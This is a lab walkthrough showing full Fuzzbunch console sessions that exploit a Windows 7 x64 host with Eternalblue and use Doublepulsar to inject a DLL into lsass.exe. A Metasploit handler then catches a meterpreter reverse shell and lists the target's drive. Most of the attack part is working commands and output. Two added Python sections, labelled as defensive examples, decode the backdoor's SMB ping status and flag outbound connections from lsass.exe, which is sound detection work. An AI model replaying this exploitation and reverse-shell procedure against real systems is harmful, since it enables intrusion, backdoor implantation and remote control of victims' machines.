Lab 3: Using the NSA MS17-010 exploit tools on Win7 to attack Win7 x64, load a DLL, and return a reverse shell to Kali
Attacker: Win7, IP 192.168.23.128
Target: Win7 64-bit, IP 192.168.23.129
Listener: Kali, IP 192.168.23.127
Attacking Win7 x64 from Win7 with the NSA MS17-010 exploit tool
C:\Users\legend\Desktop\NSA第三次泄露事件\windows\windows>python fb.py
--[ Version 3.5.1
[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON
ImplantConfig Autorun List
==========================
0) prompt confirm
1) execute
Exploit Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Special Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Payload Autorun List
====================
0) apply
1) prompt confirm
2) execute
[+] Set FbStorage => C:\Users\legend\Desktop\NSA第三次泄露事件\windows\windows\storage
[*] Retargetting Session
[?] Default Target IP Address [] : 192.168.23.129
[?] Default Callback IP Address [] : 192.168.23.127
[?] Use Redirection [yes] : no
[?] Base Log directory [D:\logs] : c:\logs
[*] Checking c:\logs for projects
Index Project
----- -------
0 fbtest
1 test
2 testsmb
3 testsmb2
4 testsmb3
5 testsmb4
6 yuxiaohan
7 Create a New Project
[?] Project [0] : 6
[?] Set target log directory to 'c:\logs\yuxiaohan\z192.168.23.129'? [Yes] :
[*] Initializing Global State
[+] Set TargetIp => 192.168.23.129
[+] Set CallbackIp => 192.168.23.127
[!] Redirection OFF
[+] Set LogDir => c:\logs\yuxiaohan\z192.168.23.129
[+] Set Project => yuxiaohan
fb > use Eter
Eternalblue Eternalchampion Eternalromance Eternalsynergy
fb > use Eternalblue
[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.23.129
[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Enter Prompt Mode :: Eternalblue
Module: Eternalblue
===================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.23.129
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
Target WIN72K8R2
[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [192.168.23.129] :
[*] TargetPort :: Port used by the SMB service for exploit connection
[?] TargetPort [445] :
[*] VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.
[?] VerifyTarget [True] :
[*] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.
[?] VerifyBackdoor [True] :
[*] MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.
[?] MaxExploitAttempts [3] :
[*] GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.
[?] GroomAllocations [12] :
[*] Target :: Operating System, Service Pack, and Architecture of target OS
0) XP Windows XP 32-Bit All Service Packs
*1) WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs
[?] Target [1] :
[!] Preparing to Execute Eternalblue
[*] Mode :: Delivery mechanism
*0) DANE Forward deployment via DARINGNEOPHYTE
1) FB Traditional deployment from within FUZZBUNCH
[?] Mode [0] : 1
[+] Run Mode: FB
[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] :
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.23.129] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.23.129:445
[+] Configure Plugin Remote Tunnels
Module: Eternalblue
===================
Name Value
---- -----
DaveProxyPort 0
NetworkTimeout 60
TargetIp 192.168.23.129
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target WIN72K8R2
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit)
[+] Backdoor is already installed -- nothing to be done.
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 01 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded
fb Special (Eternalblue) >
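The Eternalblue run above ends by pinging the DOUBLEPULSAR backdoor and printing "Backdoor returned code: 10 - Success!". Seen from the defender's side, that same ping reply is the fingerprint host scanners use to find already-infected machines. The Python below is an added example, not code from this write-up or from Fuzzbunch. It assumes two facts reported in public analyses of the leaked implant: the backdoor answers an SMBv1 Trans2 SESSION_SETUP request, and it returns its status in the SMB header's MultiplexID (MID) field as 0x41 plus the status, where 0x10 is the "Success" the log prints as code 10; a clean server echoes the request's MID unchanged. The packets are constructed for the example, not captured traffic.

```python
"""
Decode the DOUBLEPULSAR status carried in an SMBv1 Trans2 response.

Added defensive example; not code from the lab write-up or from Fuzzbunch.
Assumptions (from public analyses of the implant): the backdoor replies to
a Trans2 SESSION_SETUP probe and encodes its status in the SMB header's
MultiplexID as 0x41 + status; 0x10 is the "Success" printed as code 10.
The sample packets below are constructed, not captured.
"""
import struct

NETBIOS_HEADER_LEN = 4          # type byte + 3-byte big-endian length
SMB_HEADER_LEN = 32
SMB_COM_TRANSACTION2 = 0x32
PROBE_MID = 0x41                # MID the well-known scanners put in the probe

# status -> meaning, matching the Fuzzbunch "Backdoor returned code" line
DOUBLEPULSAR_STATUS = {
    0x10: "Success",
    0x20: "Invalid parameters",
    0x30: "Allocation failure",
}


def parse_smb1_header(packet: bytes) -> dict:
    """Return the SMBv1 header fields of a NetBIOS-framed message."""
    if len(packet) < NETBIOS_HEADER_LEN + SMB_HEADER_LEN:
        raise ValueError("packet too short for an SMBv1 header")
    nb_len = int.from_bytes(packet[1:4], "big")
    hdr = packet[NETBIOS_HEADER_LEN:NETBIOS_HEADER_LEN + SMB_HEADER_LEN]
    if hdr[:4] != b"\xffSMB":
        raise ValueError("not an SMBv1 message")
    # command(1) nt_status(4) flags(1) flags2(2) pid_high(2)
    command, nt_status, flags, flags2, pid_high = struct.unpack("<BIBHH", hdr[4:14])
    # bytes 14..21 signature, 22..23 reserved, then TID PID UID MID
    tid, pid, uid, mid = struct.unpack("<HHHH", hdr[24:32])
    return {
        "netbios_len": nb_len,
        "command": command,
        "nt_status": nt_status,
        "flags": flags,
        "flags2": flags2,
        "signature": hdr[14:22],
        "tid": tid, "pid": pid, "uid": uid, "mid": mid,
    }


def doublepulsar_status(packet: bytes):
    """Name of the backdoor status if the reply carries one, else None."""
    fields = parse_smb1_header(packet)
    if fields["command"] != SMB_COM_TRANSACTION2:
        return None
    return DOUBLEPULSAR_STATUS.get(fields["mid"] - PROBE_MID)


def build_sample_response(mid: int) -> bytes:
    """Constructed Trans2 reply header with the given MID (no body needed)."""
    hdr = (b"\xffSMB"
           + struct.pack("<BIBHH", SMB_COM_TRANSACTION2, 0, 0x98, 0xC807, 0)
           + b"\x00" * 8            # signature
           + b"\x00\x00"            # reserved
           + struct.pack("<HHHH", 0x0800, 0xFEFF, 0x0800, mid))
    return b"\x00" + len(hdr).to_bytes(3, "big") + hdr


if __name__ == "__main__":
    for mid in (0x41, 0x51, 0x61):
        verdict = doublepulsar_status(build_sample_response(mid))
        print(f"MID 0x{mid:02x}: {verdict or 'no backdoor marker'}")
```

A reply whose MID is unchanged from the probe (0x41) is a normal server; 0x51 is the "Success" ping the Fuzzbunch log reports, and 0x61/0x71 are the other two status codes. Feeding the decoder captured Trans2 replies from a scanner or a packet capture lets a responder confirm which hosts on the 192.168.23.0/24 segment still carry the implant after the exploit phase.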
Generating the payload with Doublepulsar
fb Special (Eternalblue) > use Doublepulsar
[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.23.129
[*] Applying Session Parameters
[!] Enter Prompt Mode :: Doublepulsar
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.23.129
TargetPort 445
OutputFile
Protocol SMB
Architecture x86
Function OutputInstall
[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [192.168.23.129] :
[*] TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] :
[*] Protocol :: Protocol for the backdoor to speak
*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor
[?] Protocol [0] :
[*] Architecture :: Architecture of the target OS
*0) x86 x86 32-bits
1) x64 x64 64-bits
[?] Architecture [0] : 1
[+] Set Architecture => x64
[*] Function :: Operation for backdoor to perform
*0) OutputInstall Only output the install shellcode to a binary file on disk.
1) Ping Test for presence of backdoor
2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove's backdoor from system
[?] Function [0] : 2
[+] Set Function => RunDLL
[*] DllPayload :: DLL to inject into user mode
[?] DllPayload [] : c:\backdoor.dll
[+] Set DllPayload => c:\backdoor.dll
[*] DllOrdinal :: The exported ordinal number of the DLL being injected to call
[?] DllOrdinal [1] :
[*] ProcessName :: Name of process to inject into
[?] ProcessName [lsass.exe] :
[*] ProcessCommandLine :: Command line of process to inject into
[?] ProcessCommandLine [] :
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.23.129] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.23.129:445
[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.23.129
TargetPort 445
DllPayload c:\backdoor.dll
DllOrdinal 1
ProcessName lsass.exe
ProcessCommandLine
Protocol SMB
Architecture x64
Function RunDLL
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0xF58D215B
SMB Connection string is: Windows 7 Ultimate 7600
Target OS is: 7 x64
Target SP is: 0
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Command completed successfully
[+] Doublepulsar Succeeded
fb Payload (Doublepulsar) > help
Core Commands
=============
Command Description
------- -----------
! Shortcut for shell
? Shortcut for help
autorun Set autorun mode
back Leave the current context back to the default
banner Print the startup banner
changeprompt Change the command prompt
echo Echo a message
enter Enter the context of a plugin
eof Quit program (CTRL-D)
exit Alias for back
help Print out help
history Run a previous command.
info Print information about the current context
mark Mark a session item
python Drop to an interactive Python interpreter
quit Quit fuzzbunch
redirect Configure redirection
resizeconsole None
retarget Set basic target info
script Run a script
session Show session items
setg Set a global variable
shell Execute a shell command
show Show plugin info
sleep Sleep for n seconds
standardop Print standard OP usage message
toolpaste Paste and convert data from external tool output
unsetg Unset a global variable
use Activate a plugin for use and enter context
Payload Commands
================
Command Description
------- -----------
apply Apply parameters values from session items
execute Execute the current plugin
export Export a local parameter as a global
prompt Walk through all parameters prompting for a value for each one
rendezvous Create a rendezvous input parameter
reset Reset a configuration parameter
set Set a configuration parameter
touch Run a touch plugin
validate Validate the current parameter settings
fb Payload (Doublepulsar) > execute
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.23.129] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.23.129:445
[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.23.129
TargetPort 445
DllPayload c:\backdoor.dll
DllOrdinal 1
ProcessName lsass.exe
ProcessCommandLine
Protocol SMB
Architecture x64
Function RunDLL
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0xA8C69044
SMB Connection string is: Windows 7 Ultimate 7600
Target OS is: 7 x64
Target SP is: 0
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Command completed successfully
[+] Doublepulsar Succeeded
fb Payload (Doublepulsar) >
This is very similar to Lab 1, except that the callback IP is set to the Kali address, so Kali must already be listening.
Kali listens for the reverse shell
┌──(root💀kali)-[~]
└─# msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v6.1.14-dev ]
+ -- --=[ 2180 exploits - 1155 auxiliary - 399 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View missing module options with show missing
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set lhost 192.168.23.127
lhost => 192.168.23.127
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.23.127 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.23.127:4444
[*] Sending stage (200262 bytes) to 192.168.23.129
[*] Meterpreter session 1 opened (192.168.23.127:4444 -> 192.168.23.129:49173 ) at 2022-01-23 22:32:36 +0800
meterpreter >
We now have the reverse shell.
Test
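The session line above records the observable a defender is left with: the DLL was injected into lsass.exe on 192.168.23.129 (the ProcessName chosen in the Doublepulsar prompt), and that process then opened an outbound TCP connection from port 49173 to the handler on 192.168.23.127:4444. Because the injection is done from kernel mode via an APC, no new process is created; the network connection from a process that should never originate one is the signal. The Python below is an added detection example, not part of this write-up or of Metasploit. It reads Sysmon-style network-connection events (Event ID 3 field names) as JSON lines; the events are constructed to mirror this session, and the port allowlist for lsass.exe is an assumption to tune per environment.

```python
"""
Flag outbound TCP connections from processes that should not originate them.

Added detection example; not part of the lab write-up. Consumes
Sysmon-style network-connection events (Event ID 3 fields) as JSON lines.
The sample events are constructed to mirror the lab session and the
allowlist of lsass.exe destination ports is an assumption to tune.
"""
import json

# Processes that never need to open arbitrary outbound TCP sessions.
SENSITIVE_PROCESSES = {"lsass.exe", "csrss.exe", "wininit.exe", "services.exe"}

# Ports lsass.exe legitimately reaches on a domain-joined host
# (Kerberos, RPC endpoint mapper, LDAP, SMB, kpasswd, LDAPS, global catalog).
ALLOWED_DST_PORTS = {88, 135, 389, 445, 464, 636, 3268, 3269}

# Constructed events: the meterpreter callback, a benign Kerberos exchange,
# a browser-style HTTPS connection, and the inbound SMB session.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"UtcTime": "2022-01-23 14:32:36.000", "Image": r"C:\Windows\System32\lsass.exe",
     "Protocol": "tcp", "Initiated": "true",
     "SourceIp": "192.168.23.129", "SourcePort": 49173,
     "DestinationIp": "192.168.23.127", "DestinationPort": 4444},
    {"UtcTime": "2022-01-23 14:30:01.000", "Image": r"C:\Windows\System32\lsass.exe",
     "Protocol": "tcp", "Initiated": "true",
     "SourceIp": "192.168.23.129", "SourcePort": 49160,
     "DestinationIp": "192.168.23.10", "DestinationPort": 88},
    {"UtcTime": "2022-01-23 14:31:12.000", "Image": r"C:\Windows\System32\svchost.exe",
     "Protocol": "tcp", "Initiated": "true",
     "SourceIp": "192.168.23.129", "SourcePort": 49165,
     "DestinationIp": "13.107.4.50", "DestinationPort": 443},
    {"UtcTime": "2022-01-23 14:32:30.000", "Image": "System",
     "Protocol": "tcp", "Initiated": "false",
     "SourceIp": "192.168.23.129", "SourcePort": 445,
     "DestinationIp": "192.168.23.128", "DestinationPort": 51022},
])


def parse_events(text: str) -> list:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_suspicious(event: dict, allowed=ALLOWED_DST_PORTS) -> bool:
    """True for an outbound TCP connection from a sensitive process to a
    destination port outside its allowlist."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image not in SENSITIVE_PROCESSES:
        return False
    if str(event.get("Initiated", "")).lower() != "true":
        return False                      # inbound connections are a separate rule
    if event.get("Protocol", "").lower() != "tcp":
        return False
    return int(event["DestinationPort"]) not in allowed


def find_suspicious(text: str, allowed=ALLOWED_DST_PORTS) -> list:
    """All events in the JSON-lines text that trip the rule."""
    return [e for e in parse_events(text) if is_suspicious(e, allowed)]


def describe(event: dict) -> str:
    image = event["Image"].rsplit("\\", 1)[-1]
    return (f"{event['UtcTime']} {image} {event['SourceIp']}:{event['SourcePort']}"
            f" -> {event['DestinationIp']}:{event['DestinationPort']}")


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print("SUSPICIOUS", describe(hit))
```

On a standalone workstation like the target in this lab, lsass.exe has no reason to open any outbound connection, so the allowlist can be emptied there; on domain-joined hosts the allowlist keeps Kerberos and LDAP traffic to the domain controllers quiet while the connection to 4444 still stands out.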
meterpreter > ls c:\
>
Listing: c:
===========
Mode             Size   Type  Last modified              Name
----             ----   ----  -------------              ----
40777/rwxrwxrwx  0      dir   2009-07-14 11:18:56 +0800  $Recycle.Bin
40777/rwxrwxrwx  0      dir   2009-07-14 13:08:56 +0800  Documents and Settings
40777/rwxrwxrwx  0      dir   2009-07-14 11:20:08 +0800  PerfLogs
40555/r-xr-xr-x  4096   dir   2009-07-14 11:20:08 +0800  Program Files
40555/r-xr-xr-x  4096   dir   2009-07-14 11:20:08 +0800  Program Files (x86)
40777/rwxrwxrwx  4096   dir   2009-07-14 11:20:08 +0800  ProgramData
40777/rwxrwxrwx  0      dir   2021-10-02 10:19:33 +0800  Recovery
40777/rwxrwxrwx  4096   dir   2021-10-02 10:16:23 +0800  System Volume Information
40555/r-xr-xr-x  4096   dir   2009-07-14 11:20:08 +0800  Users
40777/rwxrwxrwx  24576  dir   2009-07-14 11:20:08 +0800  Windows
0000/---------   0      fil   1970-01-01 08:00:00 +0800  hiberfil.sys
0000/---------   0      fil   1970-01-01 08:00:00 +0800  pagefile.sys
meterpreter >
Listing the target's C: drive succeeded.